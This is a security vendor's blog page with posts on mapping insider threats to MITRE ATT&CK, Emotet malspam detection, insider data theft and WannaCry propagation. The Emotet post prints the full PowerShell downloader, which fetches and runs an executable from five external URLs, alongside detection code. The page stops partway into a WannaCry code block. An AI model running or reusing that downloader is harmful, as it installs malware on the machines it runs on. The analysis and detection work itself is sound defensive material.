Mapping 'Compromised Insider' Use Case to the MITRE ATT&CK Data Source & Technique

Published: 29th June

If this is one of your use cases, Cyberseer would work with your environment to ensure we have the right data sources to provide visibility of the MITRE techniques.

Each tactic heading below is followed by the data sources and techniques that apply to it:

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network.

DATA SOURCES

  • Application Log Content
  • File Creation
  • Network Connection Creation
  • Network Traffic Content
  • Network Traffic Flow
  • Process Creation
  • Logon Session Creation
  • User Account Authentication

MITRE Techniques

  • T1566 Phishing
  • T1078 Valid Accounts

Execution consists of techniques that result in adversary-controlled code running on a local or remote system.

DATA SOURCES

  • Application Log Content
  • Command Execution
  • Container Creation
  • Container Start
  • File Creation
  • File Modification
  • Image Creation
  • Instance Creation
  • Instance Start
  • Module Load
  • Network Connection Creation
  • Network Traffic Content
  • Process Creation
  • Scheduled Job Creation
  • Script Execution

MITRE Techniques

  • T1059 Command and Scripting Interpreter
  • T1053 Scheduled Task/Job
  • T1204 User Execution
  • T1047 Windows Management Instrumentation

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network.

DATA SOURCES

  • Active Directory Object Modification
  • Command Execution
  • Container Creation
  • File Creation
  • File Metadata
  • File Modification
  • Module Load
  • OS API Execution
  • Process Access
  • Process Creation
  • Process Metadata
  • Scheduled Job Creation
  • User Account Metadata
  • WMI Creation
  • Windows Registry Key

MITRE Techniques

  • T1134 Access Token Manipulation
  • T1068 Exploitation for Privilege Escalation
  • T1055 Process Injection
  • T1053 Scheduled Task/Job
  • T1078 Valid Accounts

Credential Access consists of techniques for stealing credentials like account names and passwords.

DATA SOURCES

  • Application Log Content
  • User Account Authentication
  • Active Directory Object Access
  • Command Execution
  • File Access
  • Network Traffic Content
  • Network Traffic Flow
  • OS API Execution
  • Process Access
  • Process Creation
  • Windows Registry Key Access

MITRE Techniques

  • T1110 Brute Force
  • T1555 Credentials from Password Stores
  • T1557 Man-in-the-Middle
  • T1003 OS Credential Dumping
  • T1558 Steal or Forge Kerberos Tickets

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network.

DATA SOURCES

  • Asset logon and access
  • Authentication and access management
  • VPN and zero trust network access
  • Application Activity
  • Privileged access management and activity
  • File monitoring
  • Remote logon activity
  • DLP alerts
  • Web activity

MITRE Techniques

  • T1087 Account Discovery
  • T1135 Network Share Discovery
  • T1040 Network Sniffing
  • T1057 Process Discovery
  • T1518 Software Discovery

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.

DATA SOURCES

  • Command Execution
  • File Access
  • Firewall Enumeration
  • Firewall Metadata
  • OS API Execution
  • Process Creation
  • User Account Metadata

MITRE Techniques

  • T1534 Internal Spearphishing
  • T1563 Remote Service Session Hijacking
  • T1021 Remote Services

Exfiltration consists of techniques that adversaries may use to steal data from your network.

DATA SOURCES

  • Cloud Storage Creation
  • Cloud Storage Modification
  • Command Execution
  • File Access
  • Network Connection Creation
  • Network Traffic Content
  • Network Traffic Flow
  • Script Execution
  • Snapshot Creation
  • Snapshot Modification

MITRE Techniques

  • T1048 Exfiltration Over Alternative Protocol
  • T1041 Exfiltration Over C2 Channel
  • T1052 Exfiltration Over Physical Medium
  • T1567 Exfiltration Over Web Service
  • T1537 Transfer Data to Cloud Account

Latest blogs

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Webinar: Has Google solved Security's big data problem? - Recording

Organisations are challenged by the evolving threat landscape, the requirement to collect and process more security data, and a growing attack surface. In addition, organisations find it difficult to keep up with the operational needs of their cybersecurity analytics and operations technologies, while manual processes lead to scalability problems.

During this exclusive session, Cyberseer’s Founder, Garath Lauder, will ask some key questions around this world-first technology in cybersecurity powered by Google’s search capabilities.
 
Google’s unique unlimited hot storage model combined with Google’s economies of scale provide significant advantages for organisations, increasing visibility and improving the fidelity of forensic investigations.

So, can Google solve the vast data issue being generated by the security infrastructure?

Interested in a service?

If you would like to know more then you can download a data sheet, white paper, request a demo or get in touch with us!

Infographic: Threats From Within: Five Ways to Boost Your Detection Capability & Capacity

This infographic explores five ways to boost your detection capability and capacity:

  1. Know what to look for
  2. Employ zero trust
  3. Bring in the big guns
  4. Focus on reducing time to detection
  5. Get real-time threat detection

For more insights, read our latest eBook: Threats From Within here.

Many security teams have long feared the worst: that an innocent worker can cause as much damage as a malicious hacker. And this has often been the case. But whereas breaches in the past may have been the result of clicking a link in a fraudulent e-mail, there is now a far more ominous threat from within: the malicious insider.

Cyberseer Threat Findings Report

Published: 19th February

Keeping your business safe is your number one priority.
It's ours too.

Fusing advanced threat detection technologies with deep forensic expertise, we help you join all the dots to rapidly distil threats. Our innovative solutions give you all the confidence and proactive control you need, whatever comes your way.

We’re here to help you keep your people and your reputation safe. It’s what we do for companies around the world every day.

With Cyberseer, you’re no longer on your own.

Within this threat findings report we detail some example anomalies detected in customers’ operational environments, where Cyberseer prevented or limited the damage these cyber threats can inflict. Informing customers about relevant threats as early as possible gives them the best chance to proactively address security weaknesses and take action to prevent data loss, brand damage or system failure.

Complete the short form below to gain access to the full threat findings report.

Request Cyberseer Threat Findings

Cyberseer Annual Review

Published: 15th February

2020 was a year to remember for all the wrong reasons. Organisations were forced to immediately change to new ways of working and interacting with users and consumers.

In this report, Cyberseer reviews the issues of 2020:

  • Cloud Transformation
  • The Remote Workforce
  • Cybercrime
  • Supply Chain Security

During 2020, there was monumental change both within organisations and in how consumers interact with these organisations. Within this paper we review how you can secure the cloud, the remote workforce (those users connecting to the cloud), how cybercrime has taken advantage of COVID-19 and the increased number of attacks on supply chain security. Complete the short form below to gain access to the full report.

Request Cyberseer Annual Review

Why is visibility so important in today’s new norm of remote working?

In the wake of COVID-19 we now have new breeds of remote workers. Businesses have always had a small proportion of remote workers; however, pre-COVID-19 these were normally field-based personnel connecting to specific corporate applications and resources via VPN.

Along with the mass migration of workers to home environments, shortfalls in corporate laptops, PCs and tablets with which to arm the expanded remote workforce mean organisations are relaxing remote working policies to allow the use of personal devices (BYOD), with varying security postures, to access a much broader set of internal corporate applications than ever before. Now, more than ever, it is essential that companies have the ability to identify malicious activity originating from their remote access channels.

The majority of organisations already had varying degrees of remote access monitoring in place. However, these organisations are finding that they have to rapidly scale up their remote access infrastructures to cater for the new normal. 

Rolling out functional SaaS services and VPN connectivity quickly often introduces multiple blind spots that existing solutions weren’t designed to address. This may be a result of using new technologies or simply that the vast increase in traffic has resulted in scaling issues with existing monitoring solutions.

When scaling out infrastructure and applications we need to ensure that we have visibility into these new environments as well as have capacity within existing systems. We therefore need to review and ensure that we ingest the appropriate data sources to provide insights into these environments, as well as ensuring that we have the capacity to store the additional raw data. 

Finally, it is essential that you have an efficient SOC to actively monitor and respond to an increase in alerts.

Watch our webinar to learn more about visibility and click here to learn how ASPECT from Cyberseer can increase your SOC performance and reduce costs.

Published: 8th July

Who’s Accessing Your Data? This infographic is a timeline highlighting the cost of the Equifax breach so far. Equifax has reported clean-up costs of $1.4 billion to date; it received $125 million in cybersecurity insurance reimbursement, and the costs continue to rise.

Cyberseer Infographic - Who's Accessing Your Data? - The True Cost of the Equifax Breach...So Far!

Equifax reported 8th September 2017 that 143 million consumer records may have been stolen in a massive global data breach. Data included names, addresses and dates of birth, as well as credit card numbers in a smaller number of cases. With UK consumers, the information which may have been accessed is limited to:

Equifax stated that no UK consumers had residential addresses, passwords or financial data accessed.

The attack occurred between 13th May 2017 through to 29th July 2017. It wasn’t discovered until 29th July 2017.

The UK ICO issued a £500,000 fine to Equifax for failing to protect the personal information of up to 15 million UK citizens during the 2017 cyber attack.

The Canadian Office of the Privacy Commissioner has required Equifax’s Canadian division to sign a compliance agreement mandating Equifax submit third-party audit reports on both its security as well as the security of its parent company every two years, for the next six years.

Equifax is paying the ultimate price as its latest figures report a loss of $559.9 million for its first quarter ending March 31st, 2019. The resulting legal costs and investigations haven’t stopped taking a big bite out of the company’s bottom line.

Impact:

Five main factors of the cyber breach:

  1. Identification
  2. Detection
  3. Segmentation
  4. Data Governance
  5. Failure to rate-limit database requests

Failures that led to Equifax breach:

Equifax’s former CIO reported that, had the vulnerability been patched within two days of the patch’s release, the breach could have been prevented.

Breach costs may continue and it’s impossible at this time to estimate the additional possible loss in addition to the amount already accrued.

Attacks of this nature show why investing in your security systems matters, and why getting the basics right and maintaining them is essential. You may also find Cyberseer’s additional cybersecurity resources below useful:

8 reasons for detecting and investigating a security incident with a Managed Security Service Provider (MSSP) here

Cyberseer – Managed Security Service Partner

8 Reasons for Detecting & Investigating Security Incidents with a Managed Security Provider

The threat landscape is continually evolving and affects every type of business that embraces and relies on technology for its day-to-day operations.

The explosion of cloud-based applications and services, coupled with initiatives such as Bring Your Own Device (BYOD), presents significant security challenges to the IT security department and keeps many CISOs awake at night.

The graphic below has never been more accurate than in today’s digital, always-on world.

Graphic: sleeping positions of the CEO, CIO, COO and CISO

What are the concerns that contribute to making the role of a CISO almost untenable?

  • Increase in disparate log sources that make it challenging for some Analysts to see beyond the noise;
  • Inability to utilise effective contextual enrichment and situational awareness of the current climate;
  • Incomplete enterprise visibility with partial monitoring coverage across some areas;
  • A weak approach to threat hunting to surface anomalous activity earlier in its lifecycle;

Here are 8 critical reasons why utilising an MSSP can empower your security operations with the people, processes and technology required to take control and reduce dwell time to a minimum for your organisation.

Help ensure your CISO gets some rest and you don’t suffer the consequences of a damaging cyber breach:

1. RISING COST OF BREACHES

£2.7 million is the average cost of a data breach (Ponemon Institute, 2017 Cost of Data Breach Study).

Immediate disruption is significant! Nearly one-third of data breaches suffered by companies around the world have resulted in someone losing their job, according to a 2018 Kaspersky Lab study.

Not to mention the reputational damage, loss of competitive advantage, erosion of customer confidence, plus higher insurance premiums and regulatory fines.

With rising costs of a cyber-attack, it’s now a boardroom concern.

Utilising an MSSP to proactively monitor your enterprise can help thwart and thus significantly reduce the impact of any attacks targeting your enterprise, be it from internal or external sources.

2. GDPR IMPLICATIONS

Graphic: GDPR in numbers (the maximum penalty)

With the introduction of the EU’s General Data Protection Regulation (GDPR), it’s vital for businesses to pay even closer attention to their data protection strategies.

Organisations are at risk of significant fines if they fail to demonstrate appropriate controls and/or fail to report security breaches to a relevant authority within 72 hours.

To be able to notify the authority of a data breach within that window, organisations must invest in a holistic cybersecurity programme.

The need for improved visibility of data and the capability to detect, respond to and report breaches is now greater than ever.

An MSSP enables your organisation to align with the control mandates within GDPR and ensure that the risk of financial penalties is reduced significantly.

3. PROTECTING AGAINST MALWARE

It’s important for appropriate controls, such as behaviour-based security solutions to be deployed to accurately detect and respond to attacks before they cause significant damage to your assets and affect your reputation.

Cyberseer utilises behaviour-based endpoint monitoring technology and machine learning to surface anomalous activity swiftly.

4. IMPROVED MONITORING, DETECTION AND RESPONDING TO THREATS

Government research shows that 32% of businesses have experienced a cybersecurity attack in the last 12 months.

(Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2019: Statistical Release).

The threat of a cyber-attack is widespread and real in the UK. It’s now a case of when not if you’ll be targeted. Cybersecurity and how to protect the business are a priority issue.

Cyberseer can challenge and improve your security strategy, protecting your organisation’s assets, customer data and third-parties’ integrations from compromise.

5. MANAGE CLOUD SECURITY

As more and more organisations adopt software as a service and cloud-first initiatives, attackers are following the data.

As a result, attacks against cloud providers, telecoms and other organisations with access to large amounts of data have increased.

Cyberseer solutions incorporate log data from your cloud deployments/applications and profile this data alongside your traditional on-premise log data ensuring that complete visibility of your enterprise end to end is achieved irrespective of its location.

6. IT’S BEEN CHALLENGING FOR YOU TO FIND & RETAIN TALENT.

Recent reports estimate that by 2021, a staggering 3.5 million cybersecurity jobs will be available (Cybersecurity Ventures, Cybersecurity Job Report 2018-2021).

There is a critical talent shortage, and this alone can be a challenge. With a current cybersecurity skills shortage of 2.9 million employees, it’s no wonder that cybersecurity salaries continue to rise.

Utilising an MSSP can help to reduce the operational risk as well as ensure an unfilled vacancy doesn’t affect your front-line defences.

Cyberseer’s approach involves hiring and retaining Tier 3 Forensic Analysts as part of our managed security service team.

7. DECREASE UNNECESSARY COSTS & WASTE WHILST INCREASING EFFICIENCY.

Modern cybersecurity programs are costly to build. It can be expensive to invest in the best-in-class cybersecurity tools alongside costs for the training required for staff to use the new tools.

MSSPs enable organisations to replace the large capital expenditure associated with this investment with predictable, fixed ongoing operational costs.

Cyberseer adopts a ‘do more with less’ approach utilising next-generation technologies to reduce alert fatigue whilst embracing industry leading forensic analysts to threat hunt, triage and investigate; all encapsulated within an easy to understand user-based license model inclusive of unlimited logging.

8. LACK OF RESOURCES TO MONITOR YOUR SECURITY AT ALL HOURS.

Providing the capability to effectively monitor your enterprise around the clock can become a costly exercise. As a result, many organisations have yielded on this in favour of a 9×5 approach to monitoring.

This presents a real security risk, as adversaries can attack at any time and are not considerate of your active monitoring hours.

Cyberseer provides a 24 x 7 priority threat alerting service as part of the deployed capability.

This service autonomously notifies our analysts of anomalous activity and the Cyberseer enrichment engine starts building up threat intelligence information against individual events within the user or entity timeline to save the analyst time collecting and verifying the data.

This greatly improves the ‘Time to Respond’ (TTR) metrics as well as controlling the volume of human effort that’s required to triage each threat with the same level of accuracy.

PARTNERING WITH AN MSSP LIKE CYBERSEER DELIVERS THE FOLLOWING BENEFITS:

  • Superior protection:
    • access to the brightest minds and security expertise;
    • 24/7 threat monitoring and alerting;
    • access to best-in-class cybersecurity technology.
  • Focus on your business;
  • Cost savings;
  • Peace of mind;
  • A virtual extension of your IT security team, on hand to support you.

Many factors affect the ability of an organisation to remain secure, including an exponential increase in log data due to the adoption of cloud operating models, endpoint monitoring and more reliance being placed on online applications.

The need to ensure that your team are fully up to date on the latest threat hunting techniques, cyber exploits and vulnerabilities is critical.

To help put this challenge into perspective; it’s been estimated that 90% of all log data globally was generated within the last 24 months.

Utilising this log data effectively to your advantage and identifying malicious activity early is your biggest challenge and best defence against a damaging cyber-attack.

Cyberseer utilises machine learning technologies from leading security vendors combined with automation and orchestration from Cyberseer’s ASPECT platform (Automated Security Platform Enriching Cyber Threats).

ASPECT enhances and contextualises the data and alerts raised by monitored devices.

To achieve this ASPECT is able to continually automate and orchestrate security data to provide an enriched contextualised view of security alerts and associated intelligence that enable our analysts to quickly identify and manage threats for your organisation.

The utilisation of ASPECT and our dedicated forensic analysts ensures that, as greater reliance on cloud technologies and disparate operating models becomes more complex, the increased data volumes generated as a result don’t create gaps in visibility.

Detecting Emotet Malspam

Introduction to Emotet Malspam

Recently, one of Cyberseer’s customers was hit with a “malspam” campaign aiming to plant the Emotet malware within its network.

The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.

What is Emotet?

Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1] with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine. 

Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL. 

Upon opening the malicious document, a combination of obfuscated VBA scripts and macros instructs the target machine to download a remote payload consisting of a number of different modules.

Figure 1 – Emotet Activity [2]

Previously downloaded payloads have included:

  • Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
  • Email client infostealer – Steals e-mail credentials from email client software.
  • Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
  • PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.

Detection of Emotet

Figure 2 – Emotet Infection Chain [3]

With the first stage of the attack involving an e-mail attachment, it makes sense to start by analysing the Word document that landed in the victims’ inboxes.

As stated in the previous section, when a user opens the document and enables macros a VBA script runs; we then see the following PowerShell command executed to pull files from remote locations:

powershell.exe powershell $fbq='IkL';$qdr='https://danzarspiritandtruth.com/J7B5TiAIp@https://littlepeonyphotos.ru/jPGDyvIm@https://iuyouth.hcmiu.edu.vn/mVayv0I7S@https://exploraverde.co/mmR4TaGu8@https://turkaline.com/zGiFH0X'.Split('@');$siF=([System.IO.Path]::GetTempPath()+'\zEl.exe');$wjS =New-Object -com 'msxml2.xmlhttp';$TMS = New-Object -com 'adodb.stream';foreach($PJC in $qdr){try{$wjS.open('GET',$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}

The command contains five hard-coded URLs serving a number of different payloads; it tries each in turn and stops at the first successful download. Connections to these URLs were how Cyberseer analysts first identified the incident.

As soon as a URL was connected to, signatureless (behavioural) models first breached on the connections to the domains and then on the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment.

Figure 3 – Initial connections
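The downloader above is recognisable from its parts rather than from any signature: a list of URLs split on '@', a COM-object download (msxml2.xmlhttp written out through adodb.stream), a file dropped in the user's temp directory and launched with Start-Process. The following is an added example, not code from the original post or from Cyberseer, showing how to pick that pattern out of process-creation command lines (Sysmon Event ID 1 or Windows 4688) and extract the URLs, hosts and drop filename to block and hunt for. The sample command lines and hostnames are constructed placeholders, and the threshold of three matching components is an assumption.

```python
"""Triage of an Emotet-style PowerShell downloader from process-creation logs.
Added example, not from the original post: given a command line as Sysmon
Event ID 1 or Windows 4688 records it, decide whether it matches the pattern
above (URL list split on '@', msxml2.xmlhttp + adodb.stream download, drop to
%TEMP%, Start-Process) and extract the indicators to block and hunt for.
The sample command lines are constructed; the hostnames are placeholders."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Each component is legitimate on its own; the downloader is the combination.
PATTERN = {
    "url_list_split_on_@": re.compile(r"\.Split\(\s*'@'\s*\)", re.I),
    "msxml2.xmlhttp": re.compile(r"msxml2\.xmlhttp", re.I),
    "adodb.stream": re.compile(r"adodb\.stream", re.I),
    "drop_in_temp": re.compile(r"GetTempPath\(\)", re.I),
    "savetofile": re.compile(r"\.savetofile\(", re.I),
    "start-process": re.compile(r"Start-Process", re.I),
}
MIN_HITS = 3  # assumption: three of the six components is enough to escalate
URL_RE = re.compile(r"https?://[^\s'\"@]+", re.I)
DROP_RE = re.compile(r"GetTempPath\(\)\s*\+\s*'\\?([^']+)'", re.I)


@dataclass
class Verdict:
    matched: bool
    hits: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    hosts: List[str] = field(default_factory=list)
    drop_file: Optional[str] = None


def normalise(cmdline: str) -> str:
    """Web pages and some log pipelines turn PowerShell's quotes into curly ones; undo that."""
    return cmdline.translate(str.maketrans("\u2018\u2019\u201c\u201d", "''\"\""))


def triage_command_line(cmdline: str) -> Verdict:
    """Score one command line against PATTERN and, on a match, pull out the indicators."""
    c = normalise(cmdline)
    hits = [name for name, rx in PATTERN.items() if rx.search(c)]
    v = Verdict(matched=len(hits) >= MIN_HITS, hits=hits)
    if not v.matched:
        return v
    v.urls = URL_RE.findall(c)  # the '@' separator is excluded, so each URL comes out whole
    v.hosts = sorted({urlparse(u).hostname for u in v.urls if urlparse(u).hostname})
    m = DROP_RE.search(c)
    v.drop_file = m.group(1) if m else None
    return v


def triage_log(records: List[Tuple[str, str]]) -> List[Tuple[str, Verdict]]:
    """(host, cmdline) pairs -> [(host, Verdict)] for the command lines that match."""
    return [(host, v) for host, cmd in records if (v := triage_command_line(cmd)).matched]


# Constructed sample with the same structure as the command in the post; placeholder hosts.
SAMPLE_DOWNLOADER = (
    "powershell.exe powershell $fbq='IkL';"
    "$qdr='https://one.example.invalid/J7B5TiAIp@https://two.example.invalid/jPGDyvIm"
    "@https://three.example.invalid/mVayv0I7S'.Split('@');"
    "$siF=([System.IO.Path]::GetTempPath()+'\\zEl.exe');"
    "$wjS=New-Object -com 'msxml2.xmlhttp';$TMS=New-Object -com 'adodb.stream';"
    "foreach($PJC in $qdr){try{$wjS.open('GET',$PJC,0);$wjS.send();$TMS.open();"
    "$TMS.type=1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);"
    "Start-Process $siF;break}catch{}}"
)
SAMPLE_LOG = [  # constructed (host, command line) records
    ("WKS-0412", SAMPLE_DOWNLOADER),
    ("WKS-0170", 'powershell.exe -NoProfile -Command "Start-Process notepad.exe"'),
    ("SRV-BUILD", r"powershell.exe -ExecutionPolicy Bypass -File C:\build\publish.ps1"),
]

if __name__ == "__main__":
    for host, verdict in triage_log(SAMPLE_LOG):
        print(host, verdict.hits, verdict.hosts, verdict.drop_file)
```

Blocking the five hosts is the immediate action; the drop filename and the component names are what to search the rest of the estate for, since the next campaign will use different URLs but usually the same skeleton.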

Pivoting into the network logs, a quick investigation of the external domains reveals that five users had fallen victim to this attack:

Figure 4 – Devices associated

Drilling deeper into the connections from one of the associated devices and looking at a PCAP we can confirm the download of the malicious payloads:

Figure 5 – Executable seen in PCAP

Carving the payloads from the PCAP we get the following exe files (MD5 hash and VirusTotal link):

dd975e74625cdd2959005dc9043f4c26

https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection

9a2c288270459e95d915b8eaee7f65da

https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection

Cyberseer Analysts were able to rapidly investigate the file and contact the client. Luckily the downloaded executables were unable to execute due to permissions, allowing for them to be successfully quarantined and remediated before a further compromise could occur.

Conclusion

This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, new unknown threats. A machine-learnt behavioural approach to security is able to detect threats ahead of other traditional solutions, allowing a faster response to potential breaches. 

Security technologies that require signatures and blacklists to be updated will always be one step behind the attackers and never be able to detect new unknown threats in real-time.

Cyberseer’s threat detection and analysis managed security service bridges the gaps in an organisation’s cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation.

Understanding your organisation’s threat score and dealing with live issues early, decreases incident response times and significantly reduces the risk of cyber damage.

Insider Data Theft

After a quick browse of cybersecurity headlines, any reader would quickly see the sheer volume of new and evolving threats an organisation may face. Often the biggest threats originate from outside an organisation. However, insider threats should be treated with just as much urgency.

Whether you are a large, medium or small sized organisation, data theft is a huge problem that needs to be identified as early as possible. Not so long ago an insider data theft breach could be wrapped up and escape news headlines, however with the introduction of GDPR and strict guidelines on reporting such breaches, this is no longer the case.

Insider Data Theft Motive

Motives for insider data theft range from career development to deliberate theft intended to cause damage. Intellectual property (trade secrets and financial forecasts) and Personally Identifiable Information (PII) can be extremely valuable to the right buyer. According to the 2018 Verizon Data Breach Investigations Report [1], 76% of the breaches analysed were financially motivated.

Take the following scenario. An employee hands in their resignation; during their notice period they most likely still have access to the important systems and file shares they need for their day-to-day work. It takes them only a few minutes to transfer sensitive files to their local machine and then to a USB stick. As an organisation, how can you get the visibility to detect such an event?

Recently at a customer who has deployed an advanced network traffic monitoring solution, Cyberseer’s Analysts noticed an employee connecting to and downloading a large number of files from an internal file share.

Upon alerting the customer, it was revealed that this employee was mid-way through their notice period after recently handing in their resignation. As a senior figure, they had access to business accounts information, contracts and internal payroll data. Stepping back and looking at the incident timeline, it went as follows:

  • The remote user connects to the corporate network via VPN: their credentials are tracked, and the out-of-hours connection is abnormal when compared with the user’s daily activity.
  • The user connects to a file share: an unusual time for a connection to the file share when compared with the user’s history.
  • The user begins transferring large numbers of files to the local machine: an unusual amount of data transferred when compared with the user’s history.
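Each step in that timeline is only abnormal relative to the user's own history, so a per-user baseline is what turns the three observations into alerts. The block below is an added example, not Cyberseer's detection logic or that of any product: it builds a baseline of VPN logon hours and weekdays, file-share access hours and daily bytes read from a constructed event history, then scores new events against it and reports why each one deviates. The event format, the user and every value are constructed for the example; the thresholds (one hour of slack around the observed hours, mean plus three standard deviations for volume, at least five days of history) are assumptions to tune against real data.

```python
"""Baselining one user's VPN and file-share behaviour so the timeline above
(out-of-hours VPN logon, share access at an unusual time, abnormal volume)
produces alerts. Added example, not Cyberseer's own logic or tooling. Event
records and the user's history are constructed for the example."""
import statistics
from collections import defaultdict
from datetime import datetime

WEEKDAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]


def _constructed_history():
    """Ten working days (2019-02-04..15) of 08:xx VPN logons and 65-170 MB of share reads."""
    events = []
    for day in range(4, 16):
        d = datetime(2019, 2, day)
        if d.weekday() >= 5:
            continue
        events.append({"ts": d.replace(hour=8, minute=(day * 7) % 60).isoformat(),
                       "user": "jdoe", "type": "vpn_logon"})
        events.append({"ts": d.replace(hour=9, minute=30).isoformat(), "user": "jdoe",
                       "type": "share_read", "share": r"\\fs01\finance",
                       "bytes": 50_000_000 + 15_000_000 * (day % 10)})
    return events


HISTORY = _constructed_history()

# The resignation-period activity from the post, as constructed events.
NEW_EVENTS = [
    {"ts": "2019-02-16T23:10:00", "user": "jdoe", "type": "vpn_logon"},
    {"ts": "2019-02-16T23:20:00", "user": "jdoe", "type": "share_read",
     "share": r"\\fs01\finance", "bytes": 4_200_000_000},
    {"ts": "2019-02-18T08:15:00", "user": "jdoe", "type": "vpn_logon"},
    {"ts": "2019-02-18T09:40:00", "user": "jdoe", "type": "share_read",
     "share": r"\\fs01\finance", "bytes": 150_000_000},
]


def build_baseline(events):
    """Per user: hours and weekdays seen for VPN logons, share hours, and bytes read per day."""
    base = defaultdict(lambda: {"vpn_hours": set(), "vpn_days": set(),
                                "share_hours": set(), "daily_bytes": defaultdict(int)})
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        b = base[e["user"]]
        if e["type"] == "vpn_logon":
            b["vpn_hours"].add(ts.hour)
            b["vpn_days"].add(ts.weekday())
        elif e["type"] == "share_read":
            b["share_hours"].add(ts.hour)
            b["daily_bytes"][ts.date()] += e["bytes"]
    return base


def hour_is_unusual(hour, seen_hours, slack=1):
    """Outside every hour seen before, allowing `slack` hours either side of the observed range."""
    return bool(seen_hours) and (hour < min(seen_hours) - slack or hour > max(seen_hours) + slack)


def volume_is_unusual(nbytes, daily_bytes, zmax=3.0, min_days=5):
    """More than `zmax` standard deviations above the user's own mean daily total."""
    values = list(daily_bytes.values())
    if len(values) < min_days:
        return False  # too little history to call anything abnormal
    mean, sd = statistics.mean(values), statistics.pstdev(values)
    return nbytes > mean + zmax * max(sd, 0.1 * mean)  # floor on sd: a flat baseline must not be hair-trigger


def score_event(base, e):
    """Reasons this event deviates from the user's baseline (empty list if it does not)."""
    b = base.get(e["user"])
    if b is None:
        return ["no baseline for user"]
    ts = datetime.fromisoformat(e["ts"])
    reasons = []
    if e["type"] == "vpn_logon":
        if hour_is_unusual(ts.hour, b["vpn_hours"]):
            reasons.append(f"VPN logon at {ts:%H:%M}, usual hours {sorted(b['vpn_hours'])}")
        if ts.weekday() not in b["vpn_days"]:
            reasons.append(f"VPN logon on {WEEKDAYS[ts.weekday()]}, never seen before")
    elif e["type"] == "share_read":
        if hour_is_unusual(ts.hour, b["share_hours"]):
            reasons.append(f"share access at {ts:%H:%M}, usual hours {sorted(b['share_hours'])}")
        if volume_is_unusual(e["bytes"], b["daily_bytes"]):
            reasons.append(f"{e['bytes'] / 1e6:.0f} MB read from {e['share']}, "
                           f"daily baseline max {max(b['daily_bytes'].values()) / 1e6:.0f} MB")
    return reasons


def detect(history, new_events):
    """Events from `new_events` that deviate from the baseline built on `history`, with reasons."""
    base = build_baseline(history)
    return [(e, r) for e in new_events if (r := score_event(base, e))]


if __name__ == "__main__":
    for event, reasons in detect(HISTORY, NEW_EVENTS):
        print(event["ts"], event["type"], "->", "; ".join(reasons))
```

On its own, any one of these reasons is weak (people do occasionally work late). What made the case above clear was the sequence: an out-of-hours VPN logon, then a share connection at an unusual hour, then a volume far above anything the user had ever pulled. Chaining the flagged events for a user within a short window, rather than alerting on each in isolation, is what keeps this from drowning the analyst.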

When?

Detecting insiders committing data theft in your organisation’s network can be challenging. It’s impossible to get inside the head of your employees and equally as hard to know when they are planning to resign. Rather than waiting to be made aware of a resignation for the employee to become a high risk, think about deploying solutions that provide full visibility into your network and continuously monitor all users and devices to look out for the early signs of compromise.

Sources: [1] – https://www.verizonenterprise.com/resources/reports/rp_DBIR_2018_Report_execsummary_en_xg.pdf

WannaCry continues 21 months later

21 months after WannaCry’s initial discovery, a recent report from Kaspersky Lab has revealed that the WannaCry ransomware is still the most prevalent “crypter”, with close to 75,000 users infected as of Q3 2018, more than double that of its closest rival [1]. More worrying, however, is that between Q3 2017 and Q3 2018 the number of WannaCry attacks increased by about two thirds.

Figure 1 – Most popular Crypters [1]

WannaCry spreads using EternalBlue, a leaked NSA exploit for a flaw in Microsoft’s SMBv1 implementation. Its worm component scans for reachable devices, exploits them and then installs another leaked NSA tool, DoublePulsar, which acts as a backdoor. This self-propagating design means WannaCry has never stopped trying to spread since it was first unleashed.

Case Study

Recently a Cyberseer client was unexpectedly hit by the attack. Luckily they were not impacted by the crypter, and the propagation through the network was detected and alerted upon by Cyberseer Analysts.

– Following the initial compromise, a device was seen scanning the network for other devices accepting SMB connections:

Figure 2 – Internal SMB connections

The worm first checks whether the DoublePulsar backdoor is already present on a target; if it is, the ransomware is dropped through it. If the backdoor is not found, the EternalBlue exploit is used to compromise the host and install both WannaCry and the DoublePulsar backdoor. This can be verified by looking at a packet capture of the event:

Figure 3 – Device scanning to check whether the target Windows system has already been exploited
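The presence check above can be matched in traffic with a few bytes of SMB1 header parsing. The following is an added example, not code from the original post or from any Cyberseer tooling: it parses the 32-byte SMB1 header and the Trans2 request words ([MS-CIFS] field layout) and flags the DoublePulsar ping signature that public scanners use, namely a Trans2 SESSION_SETUP request (subcommand 0x000E) carrying Multiplex ID 0x41, and a Trans2 reply carrying Multiplex ID 0x51 from an implanted host. The sample messages are constructed here, not taken from the client's capture, and the code assumes the 4-byte NetBIOS session header has already been stripped from each message.

```python
import struct

# SMB1 constants ([MS-CIFS]); the DoublePulsar values are the well-known
# implant "ping" signature used by public scanners (nmap, Metasploit).
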